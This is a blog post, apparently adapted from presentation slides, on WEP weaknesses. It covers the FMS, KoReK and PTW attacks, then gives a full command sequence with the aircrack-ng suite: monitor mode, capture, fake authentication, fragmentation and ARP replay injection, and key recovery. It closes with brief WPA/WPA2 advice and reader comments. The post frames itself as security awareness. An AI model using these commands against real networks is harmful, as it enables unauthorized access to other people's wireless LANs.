This material is to provide information on WLAN
security risks and mitigation measure. It should not
be used for malicious intent. Unauthorized Access to
computer system is an offense.
The points made here are kept concise for the
purpose of presentation. If you require details of test
and implementation please refer to technical
History of WEP Cracking
• In 2001:
– RC4 Stream Cipher weakness discovered by Scott Fluhrer, Itsik Mantin,
and Adi Shamir
– Secret key can be recovered by collecting 4-6 millions of data packets
 Very Busy Network
– Known as FMS attack
• In 2004:
– Hacker KoReK improved the attack
– Collecting 0.5 to 2 millions of data packets Busy Network
– Known as KoReK attack
• In 2005:
– Another RC4 stream cipher in WEP implementation discovered by
Andreas Klein
– Collecting less data packets  Normal Wireless LAN traffic
– PTW attack is based on Klein’s idea
– Known as PTW attack

WEP Key Cracking Step
1. Setup Equipment
2. Find the target
3. Capture Data from Air
4. Wait
Make the Target Network Busy
5. Start Cracking from Captured Data
• Computer
• Wireless LAN card supports
– Monitoring mode
– Packet injection
• Software
– Commercial tools available on Win32 platform
– Free tools on Linux
• BackTrack CD
Wireless LAN Card
• Atheros Chipset
– Support Windows & Linux
• List of Card with Atheros Chipset

Capture Data from Air
• airmon-ng start wifi0 [channel #]
• wlanconfig ath0 destroy
• ifconfig ath1 up
• iwconfig ath1 mode Monitor channel
[channel #]
• airodump-ng -c [channel #] –bssid [BSSID]
–ivs -w cap ath1
Make the Target Network Busy
• aireplay-ng -1 0 -e [SSID] -a [BSSID] -h [Wifi
Card Mac Addr] ath1
• aireplay-ng -5 -b [BSSID] -h [Wifi Card Mac Addr]
• Wait … …
– Wait for a useful data packet for replay later
• packetforge-ng -0 -a [BSSID] -h [Wifi Card Mac
Addr] -k -l -y
frag*.xor -w arp-request
• aireplay-ng -2 -r arp-request ath1
Start Cracking from Capture Data
• aircrack-ng -n 64 -b [BSSID] cap.ivs

• In Home & Small Scale Environment
– Using WPA/WPA2-PSK
– Good password
• Password cracking for WPA/WPA2 – PSK is
• Encryption Methods in WPA/WPA2
– TKIP: using RC4

5 thoughts on “WEP Key Cracking Demo

    1. Right now hacking WEP passwords and shared-key is common and I think this is the right time to aware people to make their wireless secure and make the bad guys a little hard to break in. What do you think Jasmin?

  1. Right now it appears like WordPress is the top blogging platform out there right now.
    (from what I’ve read) Is that what you are using on your blog?

Send your feedbacks

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s